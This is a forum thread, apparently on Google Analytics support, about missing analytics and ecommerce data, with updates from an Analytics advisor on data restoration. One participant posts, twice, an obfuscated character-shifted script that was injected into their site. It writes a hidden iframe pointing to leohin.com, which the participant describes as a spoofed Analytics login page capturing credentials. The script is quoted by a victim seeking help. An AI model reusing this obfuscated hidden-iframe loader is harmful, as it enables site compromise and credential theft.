Unfortunately, it's not unusual to go through periods where ecommerce data is way off. We went almost a month with not ecommerce data last Nov and it was never updated.

Thanks for sharing. I just checked yesterday's results in analytics and it is back to normal. That's good but I sure wish it could correct itself. I imagine the data is periodically collected and then the raw files are deleted making it impossible to correct. Oh well, good thing we still run five stats programs. Of course we were almost settling on analytics exclusively.

I dunno that I'd do that (settle on GA exclusively) I'm a huge fan of it, but I see all kinds of problems still - it doesn't count large amounts of traffic, and on the ecommerce sites, we lose up to 25% of all transactions every single day - and that's with the old code, across a dozen client sites, with maybe four or five different shopping cart implementations. GA has offered to help figure out why, but we can't take down mission critical sites to have them do testing, nor can we give them backstage access to the administrative parts of the sites. So basically we can get an idea of what is happening, but it's never going to be correct.

Yep, our GA ecomm revenue and tracking was WAY off earlier this month.

GA Advisor - any info about this?

From my Google Rep:

"...regarding the issue of visits and e-commerce hits being dropped in Analytics, the official explanation that I got from our Analytics team is that Google Analytics experienced a data processing error from April 30th to May 5th. Almost all of the data has been recovered and is currently being reprocessed."

I'm not sure if this is related but recently my website was labled as as hosting badware. I have always ran a clean site and have advertised using the Google Adwords program for several years.

Google would only tell me that they see a malicous code on our site, one that I had trouble identifying.

Then yesterday morning I found a code which I thought looked suspect. It was written in a cypher and originally I thought it was just part of the programming behind the site. After looking at the string of code in more detail I realized that it was a cypher, in fact an easy one in which to decode.

Here is the original code:

="=tdsjqu?!wbs!Tus>#33(!xjeui>2!ifjhiu>2!tuzmf>(wjtjcjmjuz;!ijeefo(?=0jg
sbnf?=jgsbnf!tsd>(iuuq;00mfpijo/dpn0ejbnpoe0j0joefy/qiq@pvu>33#..epdvnfo
u/xsjuf)Tus/tvctusjoh)68-226*-Tus/tvctusjoh)1-68**!=0tdsjqu?";

And here is what I translated it to:

script – var – str – width – height – style – visibility – hidden – I – frame – I – frame – iframe – src – [leohin.com.diamond.i.index...] - document - write – str – substring – 68-226 – str – substring – 1-68 – script

Heres where it gets interesting.

If you were to go to leohin.com you would see that it was a spoofed Google Analytics site. Google as of last night has been working at getting that site taken down however from what I can discern it has been up for about three months. I have a screen shot of the spoofed Analytics site. It appears it would ask for a users login information and then capture that information before sending the person through to the Google Analytics site.

I don't know if these issues are resolved however they very well may be. It is also possible that other Google Analytics accounts have been breached like ours may have been.

It is ironic that Google flagged our account as providing malicous code and would not assist us other than verify that the code was still on the site and then it turns out that the code led back to a spoofed Google Analytics site. I've yet to hear much back regarding this but it seems interesting that I recieved notification of data loss on the analytics side during the same time this other issue was going on.

I've asked Google if there has been a security breach and will update this thread once I receive a response.

I was told the missing data (not ecommerce in my case) would be restored by 5/12 or 5/13 - or at least that was an internal deadline for the restoration. So far its not there yet as of 5/14.

mcmunsta - that issue is not related.

Do you think it could have led to a breach of Adwords or Analytics accounts?

@mcmunsta - I can't answer that, but I'd definitely recommend starting a separate thread about your topic and see if anyone can advise you.

back on topic: my rep has explained that the data restoration will be commencing tonight (I don't see anything yet) or tomorrow.

The bad news: if it doesn't occur by Friday 5/16 then I'm out of luck and the data is not retrievable.

back on topic: my rep has explained that the data restoration will be commencing tonight (I don't see anything yet) or tomorrow.

The bad news: if it doesn't occur by Friday 5/16 then I'm out of luck and the data is not retrievable.

Hi exposure & all,

My sincerest apologies for taking so long to get here; as you can imagine, it's been quite a week for us here in Analytics!

exposure, we are still in the process of restoring data, and expect it to be completed by EOD tomorrow, 5/16. I will, of course, keep this thread updated as I receive more updates.

GAA

I'm not sure if this is related but recently my website was labled as as hosting badware. I have always ran a clean site and have advertised using the Google Adwords program for several years.

Google would only tell me that they see a malicous code on our site, one that I had trouble identifying.

Then yesterday morning I found a code which I thought looked suspect. It was written in a cypher and originally I thought it was just part of the programming behind the site. After looking at the string of code in more detail I realized that it was a cypher, in fact an easy one in which to decode.

Here is the original code:

="=tdsjqu?!wbs!Tus>#33(!xjeui>2!ifjhiu>2!tuzmf>(wjtjcjmjuz;!ijeefo(?=0jg
sbnf?=jgsbnf!tsd>(iuuq;00mfpijo/dpn0ejbnpoe0j0joefy/qiq@pvu>33#..epdvnfo
u/xsjuf)Tus/tvctusjoh)68-226*-Tus/tvctusjoh)1-68**!=0tdsjqu?";

And here is what I translated it to:

script – var – str – width – height – style – visibility – hidden – I – frame – I – frame – iframe – src – [leohin.com.diamond.i.index...] - document - write – str – substring – 68-226 – str – substring – 1-68 – script

Heres where it gets interesting.

If you were to go to leohin.com you would see that it was a spoofed Google Analytics site. Google as of last night has been working at getting that site taken down however from what I can discern it has been up for about three months. I have a screen shot of the spoofed Analytics site. It appears it would ask for a users login information and then capture that information before sending the person through to the Google Analytics site.

I don't know if these issues are resolved however they very well may be. It is also possible that other Google Analytics accounts have been breached like ours may have been.

It is ironic that Google flagged our account as providing malicous code and would not assist us other than verify that the code was still on the site and then it turns out that the code led back to a spoofed Google Analytics site. I've yet to hear much back regarding this but it seems interesting that I recieved notification of data loss on the analytics side during the same time this other issue was going on.

I've asked Google if there has been a security breach and will update this thread once I receive a response.

Hi mcmunsta,

I recall your email; it was escalated to me and my team earlier this week.

Our teams are still evaluating the scope of the breach, but there seems to be a lot at work here. From experience, I strongly recommend looking into a forensic analysis to find the breach on your machine.

Feel free to PM me with questions, and I'd be happy to chat outside the context of this thread :)

GAA

Any change to the timeline? I still don't see data returning.

Any change to the timeline? I still don't see data returning.

Good Morning exposure,

Our re-load took a bit longer than previously expected. Please check now, as data has been restored.

Thanks,

GAA

GAnalyticsAdvisor - thanks for the update.
Unfortunately my data wasn't fully restored so I'll converse with my AdWords rep about the details.